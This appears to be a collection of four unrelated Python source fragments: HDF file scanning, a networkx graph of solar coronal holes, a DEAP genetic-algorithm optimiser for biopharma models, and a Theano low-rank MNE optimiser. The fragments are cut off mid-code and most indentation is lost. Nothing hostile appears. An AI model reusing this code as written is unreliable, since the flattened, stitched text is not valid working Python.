def __repr__(self):
out = 'HdfScan(filename: %s, namespace: %d, associations: %d)'
return out % (self.filename, len(self._namespace), len(self._alt_names))
def load(self):
"""Open and return hdf.File object"""
return HdfWrapper(self.filename)
def dataset(self, name):
"""Return dataset object"""
address = self.address(name)
return HdfDataset(self.filename, address)
def tree(self, group_address='/', detail=False, groups=False, recursion_limit=100):
"""
Return str of the full tree of data in a hdf object
        :param group_address: str address of hdf group to start in
:param detail: False/ True - provide further information about each group and dataset, including attributes
:param groups: False/ True - only provide group level information
:param recursion_limit: int max number of levels
:return: str
"""
with load(self.filename) as hdf:
out = tree(hdf[group_address], detail, groups, recursion_limit)
return out
info = tree
def add2namespace(self, name, data=None, other_names=None, default_value=None, hdf_address=None):
"""
set data in namespace
:param name: str name
:param data: any or None, data to store in namespace (nothing stored if None)
:param other_names: str, list of str or None - strings to associate with name, giving the same result
:param default_value: any or None, data to store in default_value namespace (nothing stored if None)
:param hdf_address: str address in hdf file
:return: None
"""
super(HdfScan, self).add2namespace(name, data, other_names, default_value)
if hdf_address:
self._hdf_name2address[name] = hdf_address
self._debug('namespace', 'Add hdf address: %s: %s' % (name, hdf_address))
def _dataset_addresses(self):
"""
Return list of hdf addresses in hdf file
:return: list of str
"""
if self._hdf_address_list:
return self._hdf_address_list
self._debug('hdf', 'Loading address list from %s' % self.file)
with load(self.filename) as hdf_group:
out = dataset_addresses(hdf_group)
self._hdf_address_list = out
return out
def _load_data(self, name):
"""
Load data from hdf file
Overloads Scan._load_data to read hdf file
if 'name' not available, raises KeyError
:param name: str name or address of data
"""
address_list = self._dataset_addresses()
# find data address
with load(self.filename) as hdf:
address = get_address(hdf, name, address_list)
self._debug('hdf', 'Search hdf for %s, find: %s' % (name, address))
if not address and name in self._alt_names:
for alt_name in self._alt_names[name]:
# alt_names must find an exact match
address = get_address(hdf, alt_name, address_list, exact_only=True)
self._debug('hdf', 'Alt. Search hdf for %s, find: %s' % (alt_name, address))
if address is not None: break
if not address:
raise KeyError('\'%s\' not available in hdf file' % name)
dataset = hdf.get(address)
data = dataset_data(dataset)
# Store for later use
| |
"""A data structure containing a Graph of coronal holes (or a set of connected sub-graphs).
Here, we analyze coronal hole connectivity- when do coronal holes merge? split? etc..
Note: this module imports networkx library.
Last Modified: May 17th, 2021 (Opal)
# todo: plot only on one axes???
"""
import networkx as nx
import matplotlib.pyplot as plt
import matplotlib.colors as c
import numpy as np
import json
class CoronalHoleGraph:
""" Coronal Hole SubGraph """
def __init__(self):
# Graph object.
self.G = nx.Graph()
# current frame number.
self.max_frame_num = 1
# y interval to plot at a time
self.y_window = 10
# number of connected sub-graphs to plot
self.plot_num_subgraphs = 5
# color dict.
self.color_dict = dict()
# total number of coronal holes.
self.total_num_of_coronal_holes = 0
# current frame number.
self.frame_num = 1
def __str__(self):
return json.dumps(
self.json_dict(), indent=4, default=lambda o: o.json_dict())
def json_dict(self):
return {
'num_of_nodes': self.G.number_of_nodes(),
'num_of_edges': self.G.number_of_edges(),
            'num_of_connected_sub_graphs': nx.number_connected_components(self.G)
}
def insert_node(self, node):
"""Insert the coronal hole (node) to graph.
Parameters
----------
node: Contour() object
Returns
-------
"""
# add node to the connectivity graph.
name = self.get_unique_id(node)
if not self.G.has_node(name):
self.G.add_node(name,
area=node.area,
id=node.id,
frame_num=node.frame_num,
frame_timestamp=node.frame_timestamp,
count=node.count,
color=node.color,
net_flux=node.net_flux,
abs_flux=node.abs_flux)
def insert_edge(self, node_1, node_2, weight=0):
"""Insert an edge between two nodes (coronal hole objects)
Parameters
----------
weight: edge weight based on area overlap ratio.
node_1: : Contour() object
node_2: : Contour() object
Returns
-------
"""
# get contour's unique ID.
n1 = self.get_unique_id(node_1)
n2 = self.get_unique_id(node_2)
# if the edge does not exist then we create it.
if not self.G.has_edge(n1, n2):
# check if the two nodes are in the graph.
if not self.G.has_node(n1):
self.insert_node(node_1)
if not self.G.has_node(n2):
self.insert_node(node_2)
# add edge between two node in Graph, with an edge weight between 0 and 1.
self.G.add_edge(u_of_edge=n1, v_of_edge=n2, weight=weight)
@staticmethod
def get_unique_id(contour):
"""Get a unique ID for a given contour.
Parameters
----------
contour: Contour() object.
Returns
-------
        str
"""
return str(contour.frame_num) + "_" + str(contour.id) + "_" + str(contour.count)
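    # Illustrative sketch only (Contour objects come from the tracking code, and the
    # attribute values implied here are made up): nodes are keyed by the
    # "frame_num_id_count" string built above.
    #
    #     graph = CoronalHoleGraph()
    #     graph.insert_node(contour_a)                         # e.g. node "1_3_0"
    #     graph.insert_edge(contour_a, contour_b, weight=0.8)  # area-overlap weight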
@staticmethod
def get_sub_graph_pos(sub_graph):
"""Return a dictionary with sub-graph node position used for matplotlib plot (see create_plots())
Parameters
----------
sub_graph: nx.subgraph()
connected sub-graph of self.G.
Returns
-------
dict() with nodes x-y coordinates for plotting purposes.
"""
# initialize position and label dictionaries.
pos = dict()
label = dict()
# iterate over all subgraph nodes.
for node in sub_graph:
# (x location, y location)- tuple
pos[node] = (sub_graph.nodes[node]["x-pos"], sub_graph.nodes[node]["frame_num"])
# class id number
label[node] = sub_graph.nodes[node]["id"]
return pos, label
@staticmethod
def assign_x_pos_for_each_node_in_subgraph(sub_graph):
"""Assign an x axis location attribute to each node
based on the number of nodes assigned in the same frame_num, for
plotting purposes (x-axis)
Returns
-------
subgraph
"""
# list of all frame numbers in input sub-graph
frame_list = [sub_graph.nodes[node]["frame_num"] for node in sub_graph]
# list of all IDs in the sub-graph.
id_list = [sub_graph.nodes[node]["id"] for node in sub_graph]
# each ID gets a count based on area.
count_list = list(set(id_list))
# check if there are multiple nodes of the same id in the same list.
tuple_list = list(zip(frame_list, id_list))
dup_max = dict()
for frame, id in set(tuple_list):
appearances = tuple_list.count((frame, id))
if appearances > 1:
if id in dup_max.keys():
if dup_max[id] < appearances:
dup_max[id] = appearances
else:
dup_max[id] = appearances
pp = 0 # x-pos starter for this id number.
for id in dup_max.keys():
holder = dup_max[id]
# update x-pos starter.
dup_max[id] = pp
# update x-pos starter for the next duplicated id.
pp += holder
# remove this id from the list of counts.
count_list.remove(id)
# assign (x-axis position) to each node
count_len = len(count_list)
for node in sub_graph:
if sub_graph.nodes[node]["id"] in count_list:
sub_graph.nodes[node]["x-pos"] = count_list.index(sub_graph.nodes[node]["id"])
else:
# it has multiple nodes with the same id in the same frame instance.
sub_graph.nodes[node]["x-pos"] = sub_graph.nodes[node]["count"] + count_len + \
dup_max[sub_graph.nodes[node]["id"]]
return sub_graph
def get_plot_features(self, sub_graph):
"""Return sub-graph node x-y location and label.
Parameters
----------
sub_graph: nx.subgraph()
connected sub-graph of self.G.
Returns
-------
pos, labels (dict, dict)
"""
self.assign_x_pos_for_each_node_in_subgraph(sub_graph=sub_graph)
pos, label = self.get_sub_graph_pos(sub_graph=sub_graph)
return pos, label
def get_edge_weight_lim(self):
"""Find the maximum edge weight in the graph.
Returns
-------
(float)
"""
if len(self.G.edges) == 0:
return 0, 0
else:
edge_weights = nx.get_edge_attributes(G=self.G, name='weight')
edges, weights = zip(*edge_weights.items())
return min(weights), max(weights)
@staticmethod
def average_area_of_subgraph(sub_graph):
"""Compute the average area of the nodes in subgraph. 1/frame_appearance *sum(node_area)
Returns
-------
(float)
"""
# list of node area.
area_list = [sub_graph.nodes[node]["area"] for node in sub_graph.nodes]
frame_appearance = [sub_graph.nodes[node]["frame_num"] for node in sub_graph.nodes]
return sum(area_list) / len(set(frame_appearance))
def order_subgraphs_based_on_area(self):
""" order the connected subgraphs in self.G based on area.
Returns
-------
(list) ordered subgraphs based on area.
"""
# list of all connected subgraphs in G
subgraph_list = list(nx.connected_components(self.G))
# compute the corresponding average area
corresponding_area = np.array([self.average_area_of_subgraph(sub_graph=self.G.subgraph(sub_graph))
for sub_graph in subgraph_list])
# sort the list above and save the corresponding index position of the sorted list.
sorted_index = np.argsort(-corresponding_area)
# return sorted subgraph list based on area. The subgraph with the largest area will show up first.
# (descending order)
return [subgraph_list[i] for i in sorted_index]
def return_list_of_nodes_in_frame_window(self, subgraph):
"""return a list of nodes in the frame window.
Parameters
----------
subgraph: a connected subgraph in G.
Returns
-------
(list) of contour nodes that are in the frame.
"""
node_list = []
for node in subgraph.nodes:
if self.max_frame_num < self.y_window:
node_list.append(node)
elif (self.max_frame_num - self.y_window) <= subgraph.nodes[node]["frame_num"] <= self.max_frame_num:
node_list.append(node)
return node_list
def create_plots(self, save_dir=False, subplots=True, timestamps=False, dpi=200):
"""Plot the resulting isolated connected sub - graphs in separate figures.
Parameters
----------
timestamps: (bool or list)
If set to False, y axis labels are the frame number. Otherwise y axis labels will be the timestamps.
subplots: (bool)
            If subplots is True, the sub-graphs are plotted on the same figure as subplots.
            This is not recommended when there are a large number of nodes in each subplot.
save_dir: (bool or str)
If not False, will save figures in save_dir directory.
Returns
-------
N/A
"""
num_of_subplots = len(list(nx.connected_components(self.G)))
if subplots:
num_columns = min(self.plot_num_subgraphs, num_of_subplots)
fig, axes = plt.subplots(nrows=1, ncols=num_columns, sharey=True)
axes = axes.flatten()
ii = 0
edge_color_bar = None
# number of deleted axes
del_axes = []
# sort the subgraphs based on area. The first subgraphs are long lived-large coronal holes.
sub_graph_list = self.order_subgraphs_based_on_area()[:min(self.plot_num_subgraphs, num_of_subplots)]
# loop over each subgraph and plot
for connectedG in sub_graph_list:
# connect sub graph.
sub_graph = self.G.subgraph(connectedG)
# prune the list of nodes for each plot based on their frame number.
list_of_nodes_in_range = self.return_list_of_nodes_in_frame_window(subgraph=sub_graph)
if len(list_of_nodes_in_range) == 0:
if subplots:
ii += -1
del_axes.append(ii)
elif len(list_of_nodes_in_range) > 0:
sub_graph = self.G.subgraph(nodes=list_of_nodes_in_range)
# plot a hierarchical graph.
if subplots:
ax = axes[ii]
else:
fig, ax = plt.subplots()
# draw graph, nodes positions are based on their count and frame_num.
# labels are the coronal hole id number.
pos, labels = self.get_plot_features(sub_graph=sub_graph)
if sub_graph.number_of_nodes() == 1:
# plot nodes and labels.
nx.draw(sub_graph, pos=pos, font_weight='bold', ax=ax, node_size=80,
node_color=[c.to_rgba(np.array(sub_graph.nodes[ch]["color"]) / 255)
for ch in sub_graph.nodes])
nx.draw_networkx_labels(G=sub_graph, pos=pos, labels=labels, ax=ax, font_size=8)
elif sub_graph.number_of_nodes() > 1:
edge_weights = nx.get_edge_attributes(G=sub_graph, name='weight')
if len(edge_weights) > 0:
edges, weights = zip(*edge_weights.items())
# plot nodes and labels.
nx.draw(sub_graph, pos=pos, font_weight='bold', ax=ax, node_size=80,
node_color=[c.to_rgba(np.array(sub_graph.nodes[ch]["color"]) / 255)
for ch in sub_graph.nodes], edgelist=[])
nx.draw_networkx_labels(G=sub_graph, pos=pos, labels=labels, ax=ax, font_size=8)
edge_color_bar = nx.draw_networkx_edges(sub_graph, pos=pos, edge_color=weights, edgelist=edges,
edge_cmap=plt.cm.get_cmap('Greys'), edge_vmin=0,
edge_vmax=1, width=3, ax=ax)
# nx.draw_networkx_edge_labels(G=sub_graph, pos=pos,
# edge_labels=edge_weights, ax=ax,
# alpha=1, font_size=5)
if subplots:
# Hide the right and top spines
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
# restrict y limits so the graph plot is readable.
if self.max_frame_num < self.y_window:
ax.set_ylim(0, self.max_frame_num + 0.5)
else:
ax.set_ylim((self.max_frame_num - self.y_window) - 0.5, self.max_frame_num + 0.5)
if ii == 0:
# Only show ticks on the left and bottom spines
ax.yaxis.set_ticks_position('left')
ax.set_xlim(tuple(sum(i) for i in zip(ax.get_xlim(), (-0.5, 0.5))))
# ax.xaxis.set_ticks_position('bottom')
# set x and y axis ticks to be integers
ax.yaxis.get_major_locator().set_params(integer=True)
ax.xaxis.get_major_locator().set_params(integer=True)
# timestamp as y axis.
if timestamps:
ax.set_yticklabels(timestamps)
ax.axis('on')
ax.set_ylabel("frame number")
else:
ax.set_xlim(tuple(sum(i) for i in zip(ax.get_xlim(), (-0.5, 0.5))))
ax.spines['left'].set_visible(False)
# ax.xaxis.set_ticks_position('bottom')
ax.xaxis.get_major_locator().set_params(integer=True)
ax.axis('on')
# label axes and title.
if not subplots:
ax.axis('on')
ax.set_xlabel("count")
| |
"""The main Optimiser class."""
import biopharma as bp
from biopharma.server.tasks import SoftTimeLimitExceeded
from biopharma.specs import Value, Table, in_units
from .individual import Individual, Variable
from .util import get_item, with_units
import numbers
import random
from enum import Enum
import deap.base
import deap.creator
import deap.tools
import numpy as np
__all__ = ['Optimiser', 'Tracking']
class Optimiser(bp.AnalysisComponent):
"""Genetic algorithm-based optimisation for PyBioPharma models.
TODO: Some documentation on how to do optimisation.
"""
PARAMETERS = {
'populationSize': Value(
int, 'How many individual facilities to evaluate in each population'),
'maxGenerations': Value(
int, 'How many generations of the genetic algorithm to run'),
'crossoverProbability': Value(
float, 'Probability that genetic crossover occurs between 2 individuals'),
'geneCrossoverProbability': Value(
float, 'If crossover occurs, probability that any single gene will be swapped'),
'mutationRate': Value(
float, 'Average number of genes in an individual that will mutate each generation'),
}
OUTPUTS = {
'finalPopulation': Value(list, 'The final population from the genetic algorithm'),
'bestIndividuals': Value(list, 'All non-dominated individuals'),
'bestObjectiveValues': Value(list, 'The fitness(es) recorded for the best individual(s)'),
'seed': Value(tuple, 'The initial state of the random number generator for this run')
}
def __init__(self, base_component, **kwargs):
"""Create a new optimiser.
:param base_component: the base component on which to run the optimiser
(typically, the Facility to optimise).
:param kwargs: further keyword arguments are passed to ModelComponent.__init__, notably
name and param_filename.
"""
super(Optimiser, self).__init__(**kwargs)
self.base = base_component
self.facility = self.base.facility
self.variable_specs = []
self.all_stats = {}
self.objectives = []
self.debug = False
self.load_parameters()
def add_variable(self, klass=Variable, *args, **kwargs):
"""Add a 'gene' specification that can vary across individuals.
:param klass: the class of Variable to use, in case a subclass is desired.
:param args: positional arguments to use when constructing instances of the class.
:param kwargs: keyword arguments to use when constructing instances of the class.
"""
assert issubclass(klass, Variable)
self.variable_specs.append((klass, args, kwargs))
def add_objective(self, component, item, collection='outputs',
minimise=False, maximise=False, weight=1.0):
"""Add a new objective to optimise for.
:param component: a function that takes a Facility instance as argument and returns the
component in which to look for the value of this objective for that Facility.
:param item: the name of the item (typically an output) within the component to use as
the objective value.
:param collection: which collection (i.e. inputs, parameters, or outputs) to look for
item in.
:param minimise: set to True if this objective should be minimised.
:param maximise: set to True if this objective should be maximised.
:param weight: can be used in multi-objective optimisation to make some objectives more
important than others. Should be a positive real number.
Exactly one of minimise or maximise must be set to True.
"""
assert minimise or maximise
assert not (minimise and maximise)
if minimise:
weight = -weight
self.objectives.append({
'component': component, 'item': item, 'collection': collection, 'weight': weight})
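    # Example (illustrative component/item names): minimise cost and, with a lower
    # weight, maximise yield.
    #
    #     opt.add_objective(lambda fac: fac, 'costOfGoods', minimise=True)
    #     opt.add_objective(lambda fac: fac, 'productYield', maximise=True, weight=0.5)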
def run(self):
"""Run an optimisation.
Uses elitist single-objective or multi-objective GA at present.
"""
print('Running optimiser for {} generations with {} individuals'.format(
self.parameters['maxGenerations'], self.parameters['populationSize']))
# Reset the facility
self.facility.load_parameters()
# Record the current state of the random number generator
initial_seed = self.get_seed()
self.outputs['seed'] = initial_seed
if self.debug:
print("RNG state:", initial_seed)
# Initialise the GA tools
self._initialise()
toolbox = self.toolbox
params = self.parameters
stats = self.stats
logbook = self.logbook
# Create and evaluate initial population
pop = toolbox.population(n=params['populationSize'])
fitnesses = toolbox.map(toolbox.evaluate, pop)
for ind, fitness in zip(pop, fitnesses):
ind.fitness.values = fitness
print()
# Run generations
for gen in range(params['maxGenerations']):
# Record statistics for this generation
logbook.record(gen=gen, **stats.compile(pop))
print('Evolving generation', gen)
if self.debug:
print(pop)
# Select offspring for the next generation, and clone them
offspring = toolbox.select(pop, len(pop))
offspring = list(map(toolbox.clone, offspring))
# Apply crossover and mutation on the offspring
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < params['crossoverProbability']:
toolbox.mate(child1, child2)
# Invalidate the old fitness values
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
toolbox.mutate(mutant)
del mutant.fitness.values
# Evaluate the individuals with an invalid fitness
invalid_ind = [ind for ind in offspring if not ind.fitness.valid]
fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)
for ind, fit in zip(invalid_ind, fitnesses):
ind.fitness.values = fit
print()
# The new population takes the best half of pop + offspring
pop = toolbox.selectNewPop(pop + offspring, len(pop))
# Record statistics for the final generation
logbook.record(gen=gen + 1, **stats.compile(pop))
# Save outputs
outputs = self.outputs
outputs['finalPopulation'] = pop
outputs['bestIndividuals'] = self.best_individuals(pop)
outputs['bestObjectiveValues'] = [ind.fitness.values for ind in outputs['bestIndividuals']]
print('Optimisation done!')
def best_individuals(self, pop):
"""Return the best individuals in the given population.
Finds those that have the best score in at least one objective. There
will thus be at most k individuals returned, where k is the number of
objectives.
:param pop: a list of individuals, assumed to be sorted by fitness
:returns: a list of the 'best' individuals within pop
"""
best = []
for i, obj in enumerate(self.objectives):
best_i = None
for ind in pop:
if best_i is None or (ind.fitness.values[i] * obj['weight'] >
best_i.fitness.values[i] * obj['weight']):
best_i = ind
best.append(best_i)
# We now need to remove duplicates and maintain the same ordering as in pop.
# It's non-trivial to hash individuals (and they're mutable), so we can't use a set.
# Even using the 'in' operator doesn't help as different objects with the same genome
# are treated as distinct!
# Instead we need to compare explicitly with ==
deduped = []
for ind in pop:
if ind in best:
for existing in deduped:
if ind == existing:
break
else:
deduped.append(ind)
assert len(deduped) <= len(self.objectives) # Paranoia
return deduped
def save_results(self):
"""Return key result information as a YAML text string.
This is suitable for being reloaded by load_results().
"""
import yaml
return yaml.dump(self.extract_outputs())
def load_results(self, stream):
"""Load details of the final population saved by save_results.
The save_results method will serialise key information about individuals
to a YAML document (text string). This method, if passed this data and
called on an Optimiser with the same objectives and variable definitions,
will reconstruct an equivalent outputs dictionary to the original optimiser.
This is primarily for use by the web interface, which needs to analyse the
results of saved experiments, but could be of utility to researchers using
the code directly as well.
:param stream: string or open file with YAML data
"""
self._initialise()
import yaml
loaded = yaml.safe_load(stream)
# Simple outputs copy directly
outputs = self.outputs
for name in ['bestObjectiveValues', 'seed']:
outputs[name] = loaded[name]
# For individuals we need to reconstruct proper objects
individuals = {}
for ind_data in loaded['finalPopulation']:
ind = individuals[id(ind_data)] = Individual(self, draw=False)
ind.error = ind_data['error']
ind.fitness.values = ind_data['fitness']
for var, var_data in zip(ind.variables, ind_data['variables']):
assert var_data['name'] == var.name
collection = getattr(var.component, var.collection)
spec = collection.spec[var.item]
var.value = spec.parse(var_data['value'])
outputs['finalPopulation'] = [individuals[id(ind_data)]
for ind_data in loaded['finalPopulation']]
outputs['bestIndividuals'] = [individuals[id(ind_data)]
for ind_data in loaded['bestIndividuals']]
# Below here are methods not intended for direct use by users.
def _initialise(self):
"""Prepare to run an optimisation."""
self._setup_toolbox()
# Set up the Fitness class for individuals to use
if hasattr(deap.creator, 'Fitness'):
del deap.creator.Fitness
weights = [obj['weight'] for obj in self.objectives]
deap.creator.create('Fitness', deap.base.Fitness, weights=weights)
# Determine a 'simulation failed' fitness for each objective
for obj in self.objectives:
obj['infinity'] = -obj['weight'] * float('inf')
self._setup_logbook()
def _objective_selector(self, obj):
"""Selector function for objectives.
Handles finding the right output (or other item) and ensuring it's a quantity
or plain number.
TODO: Better docs & name!
"""
component = obj['component'](self.base)
collection = getattr(component, obj['collection'])
value = get_item(collection, obj['item'])
if hasattr(value, 'magnitude'):
value = value.magnitude
assert isinstance(value, numbers.Number)
return value
def _setup_toolbox(self):
"""Set up the DEAP toolboxes of GA component functions."""
self.toolbox = toolbox = deap.base.Toolbox()
toolbox.register('population', deap.tools.initRepeat, list, self.make_individual)
toolbox.register('evaluate', self.evaluate_individual)
toolbox.register('mate', self.crossover)
toolbox.register('mutate', self.mutate)
# Selection depends on whether this is single- or multi-objective
if len(self.objectives) == 1:
toolbox.register('select', deap.tools.selTournament, tournsize=2)
toolbox.register('selectNewPop', deap.tools.selBest)
else:
toolbox.register('select', self.selTournamentNSGA2, tournsize=2)
toolbox.register('selectNewPop', deap.tools.selNSGA2)
def selTournamentNSGA2(self, individuals, k, tournsize):
"""Select k individuals by repeated NSGA2 tournaments.
:param individuals: A list of individuals to select from.
:param k: The number of individuals to select.
:param tournsize: The number of individuals participating in each tournament.
:returns: A list of selected individuals.
"""
| |
import numpy as np
import theano
import theano.tensor as T
from . import model
""" optimizer.py (module)
The optimizer module contains the Optimizer class that is used
to configure low-rank MNE models, initialize the solver, and
minimize the (possibly constrained and regularized) objective
function.
"""
class Optimizer(object):
""" Optimizer (class)
The Optimizer class is the interface used for constructing
and optimizing low-rank MNE models. This class is built
flexibly to allow for easy customization.
"""
def __init__(self, resp, feat, rank, cetype=None, citype=None, rtype=None, solver=None, **kwargs):
"""Initialize Optimizer class instantiation.
[inputs] (resp, feat, rank, cetype=None, citype=None,
rtype=None, solver=None, datasets=None, **kwargs)
resp: dict with keys 'train' 'cv' and 'test' mapping to
numpy array of the output labels with shape
(nsamp,) where nsamp is the number of data
samples. Each element of resp must be in the range
[0, 1].
feat: dict with keys 'train' 'cv' and 'test' mapping to
numpy array of the input features with shape
(nsamp, ndim) where ndim is the number of features.
rank: positive integer that sets the number of columns
of the matrices U and V(that both have shape (ndim,
rank)).
cetype: (optional) list of strings that tell the class
which equality constraints, if any, are being
used. Can set to None if no equality constraints are
used. Available equality constraints:
- "UV-linear-insert": these sets each U[:,k] =
csigns[k]*V[:,k] for all k in range(rank) and
directly imposes this constraint by substitution.
Note that csigns is a numpy array of binary
integers in {-1, 1} that sets the sign
relationship between each component of U and V.
csigns may be set using **kwargs. - "UV-linear":
these are the same constraints as UV-linear-insert
but instead of direct substitution the constraints
are imposed using the method Lagrange
multipliers. csigns must also be set through
**kwargs. - "UV-quadratic": these constraints are
the equality constraints defined by the upper
triangle of np.dot(U, U.T) == np.dot(V, V.T). -
"UV-bilinear": these constraints are the equality
constraints defined by the upper triangle (with
diagonal excluded) of np.dot(U, V.T) == np.dot(V,
U.T).
citype: (optional) list of strings that tell the class
which equality constraints, if any, are being
used. Can set to None if no equality constraints are
used. No inequality constraints are defined at this
time.
rtype: (optional) list of strings that tell the class
which regularization penalties, if any, should be
added to the objective function. Can set to None if
no penalty functions are applied. Available penalty
functions:
- "nuclear-norm": the nuclear-norm regularizes over
the Frobenius-norms of U and V and promotes
sparsity of the eigenvalue spectrum of J =
np.dot(U, V.T).
solver: (optional) must be set and initialized (using
class function init_solver) before beginning the
optimization. It is optional to set here, however.
"""
# initialize class members to standard arguments
self.rank = rank
self.cetype = cetype
self.citype = citype
self.rtype = rtype
self.solver = solver
# get data sizes
self.ntrain, self.ncv, self.ntest = feat['train'].shape[0], feat['cv'].shape[0], feat['test'].shape[0]
self.nsamp = self.ntrain + self.ncv + self.ntest
self.ndim = feat['train'].shape[1]
assert feat['test'].shape[1] == self.ndim
assert feat['cv'].shape[1] == self.ndim
assert set(feat.keys()) == set(resp.keys())
# initialize class members to keyword arguments
        self.fscale = self.get_model_scaling(kwargs.get("fscale", None), datasets=resp.keys())
self.float_dtype = kwargs.get("float_dtype", np.float64)
self.precompile = kwargs.get("precompile", True)
# declare theano variables
self.x_dev = T.vector("x_dev")
self.lda_dev = T.vector("lambda_dev")
# set-up the model(s)
self.train_model, self.cv_model, self.test_model = self.config_models(resp, feat, **kwargs)
# build expressions for model(s)
self.build_expressions(self.train_model, grad=kwargs.get("compute_grad", True), hess=kwargs.get("compute_hess", False), **kwargs)
self.build_expressions(self.cv_model, grad=False, hess=False, **kwargs)
self.build_expressions(self.test_model, grad=False, hess=False, **kwargs)
# compile the expressions
if kwargs.get("precompile", True):
self.compile_expressions(self.train_model, grad=kwargs.get("compute_grad", True), hess=kwargs.get("compute_hess", False), **kwargs)
self.compile_expressions(self.cv_model, grad=False, hess=False, **kwargs)
self.compile_expressions(self.test_model, grad=False, hess=False, **kwargs)
# initialize solver
if solver is not None:
self.init_solver(**kwargs)
self.initialized = True
def get_model_scaling(self, fscale, datasets=None, **kwargs):
""" Determine the scaling of the negative log-likelihood objective
function (from mner.model.py).
[inputs] (fscale, datasets=None, **kwargs)
fscale: dict with keys "trainset", "cvset", and
"testset" with values that give the rescaling of the
objective function for the training set,
cross-validation set, and test set, respectively. If
a value is set to <=0 then the objective function is
scaled by the number of samples in each data
subset. If a value is set to None, then the
objective function is unscaled.
datasets: iterable of datasets available (a subset
of {'train', 'cv', 'test'})
[returns] fscale
fscale: see inputs.
"""
if fscale is None:
fscale = dict()
if 'train' in datasets:
fscale["trainset"] = 1.0
if 'cv' in datasets:
fscale["cvset"] = 1.0
if 'test' in datasets:
fscale["testset"] = 1.0
else:
fscale["trainset"] = 1.0
else:
if not isinstance(fscale, dict):
if isinstance(fscale, list) or isinstance(fscale, tuple):
tmp = list(fscale)
fscale = dict()
idx = 0
if 'train' in datasets:
fscale["trainset"] = tmp[idx]
idx += 1
if 'cv' in datasets:
fscale["cvset"] = tmp[idx]
idx += 1
if 'test' in datasets:
fscale["testset"] = tmp[idx]
idx += 1
else:
fscale = {"trainset": fscale, "cvset": fscale, "testset": fscale}
# if the scaling is set to a non-positive number, scale by 1.0/samples;
# a missing or None entry leaves the objective unscaled (factor 1.0);
# any other user-supplied value is kept as-is
if fscale.get("trainset") is not None and fscale["trainset"] <= 0.0:
fscale["trainset"] = 1.0/self.ntrain
elif fscale.get("trainset") is None:
fscale["trainset"] = 1.0
if fscale.get("cvset") is not None and fscale["cvset"] <= 0.0:
fscale["cvset"] = 1.0/self.ncv
elif fscale.get("cvset") is None:
fscale["cvset"] = 1.0
if fscale.get("testset") is not None and fscale["testset"] <= 0.0:
fscale["testset"] = 1.0/self.ntest
elif fscale.get("testset") is None:
fscale["testset"] = 1.0
return fscale
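# A minimal sketch of how fscale entries are interpreted (hypothetical values;
# the "trainset"/"cvset"/"testset" keys follow the docstring above):
#     fscale = {"trainset": -1, "cvset": -1, "testset": None}
#     # a value <= 0 means "scale by 1/number-of-samples", e.g. 1.0/self.ntrain;
#     # None (or a missing key) leaves that objective unscaled (factor 1.0);
#     # any positive value is passed through unchanged.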
def config_models(self, resp, feat, fscale=None, **kwargs):
""" Configure the low-rank MNE model(s) by instantiating the class
MNEr from mner.model.py.
[inputs] (resp, feat, fscale=None, **kwargs)
resp: see the class function __init__
feat: see the class function __init__
fscale: (optional) see the class function
get_model_scaling
[returns] (train_model, cv_model, test_model)
train_model: training set instantiation of class MNEr
with any regularization and constraints imposed.
cv_model: cross-validation set instantiation of class
MNEr (unregularized and no constraints)
test_model: test set instantiation of class MNEr
(unregularized and no constraints)
"""
self.use_vars = kwargs.get("use_vars", {'avar': True, 'hvar': True, 'UVvar': True})
self.use_consts = kwargs.get("use_consts", {'aconst': False, 'hconst': False, 'UVconst': False, 'Jconst': False})
train_model = model.MNEr(
resp['train'], feat['train'], self.rank, cetype=self.cetype, citype=self.citype,
rtype=self.rtype, fscale=self.fscale["trainset"], use_vars=self.use_vars,
use_consts=self.use_consts, x_dev=self.x_dev, **kwargs
)
if self.ncv > 0:
cv_model = model.MNEr(
resp['cv'], feat['cv'], self.rank, cetype=self.cetype, citype=self.citype,
fscale=self.fscale["cvset"], use_vars=self.use_vars, use_consts=self.use_consts,
x_dev=self.x_dev, **kwargs
)
else:
cv_model = None
if self.ntest > 0:
test_model = model.MNEr(
resp['test'], feat['test'], self.rank, cetype=self.cetype, citype=self.citype,
fscale=self.fscale["testset"], use_vars=self.use_vars, use_consts=self.use_consts,
x_dev=self.x_dev, **kwargs
)
else:
test_model = None
return (train_model, cv_model, test_model)
def build_expressions(self, model, grad=True, hess=False, **kwargs):
"""Build Theano expressions for the objective, constraints, gradient,
Jacobians, and Hessian, if applicable, for a given model.
[inputs] (model, grad=True, hess=False, **kwargs)
model: instantiation of class MNEr from mner.model.py
grad: (optional) Boolean; if True, builds the
gradient.
hess: (optional) Boolean; if True, builds the Hessian.
"""
if model is not None:
# build cost expression (gradient and hessian, if applicable)
# note that regularization is included in the cost expression
model.cost_expr(self.x_dev)
if grad:
model.cost_grad_expr(self.x_dev)
if hess:
model.cost_hess_expr(self.x_dev)
# build equality constraints expressions (gradient and hessian, if applicable)
if model.num_lagrange_cetypes:
model.ceq_expr(self.x_dev)
if grad:
model.ceq_jaco_expr(self.x_dev)
if hess:
model.ceq_hess_expr(self.x_dev, self.lda_dev)
# build inequality constraints expressions (gradient and hessian, if applicable)
if model.num_lagrange_citypes:
model.cineq_expr(self.x_dev)
if grad:
model.cineq_jaco_expr(self.x_dev)
if hess:
model.cineq_hess_expr(self.x_dev)
def compile_expressions(self, model, grad=True, hess=False, **kwargs):
"""Compile Theano expressions into device functions for a given
model.
[inputs] (model, grad=True, hess=False, **kwargs)
model: instantiation of class MNEr from mner.model.py
grad: (optional) Boolean; if True, compiles the
gradient
hess: (optional) Boolean; if True, compiles the
Hessian
"""
if model is not None:
# compile cost function (gradient and hessian, if applicable)
# note that this cost function includes regularization
model.compile_cost(self.x_dev)
if grad:
model.compile_cost_grad(self.x_dev)
if hess:
model.compile_cost_hess(self.x_dev)
# compile equality constraints (gradient and hessian, if applicable)
if model.cetype is not None and len(model.cetype):
model.compile_ceq(self.x_dev)
if grad:
model.compile_ceq_jaco(self.x_dev)
if hess:
model.compile_ceq_hess(self.x_dev, self.lda_dev)
# compile inequality constraints (gradient and hessian, if applicable)
if model.citype is not None and len(model.citype):
model.compile_cineq(self.x_dev)
if grad:
model.compile_cineq_jaco(self.x_dev)
if hess:
model.compile_cineq_hess(self.x_dev, self.lda_dev)
def init_solver(self, **kwargs):
""" Initialize the solver object.
[inputs] (**kwargs)
"""
if not hasattr(self.solver, 'initialized')
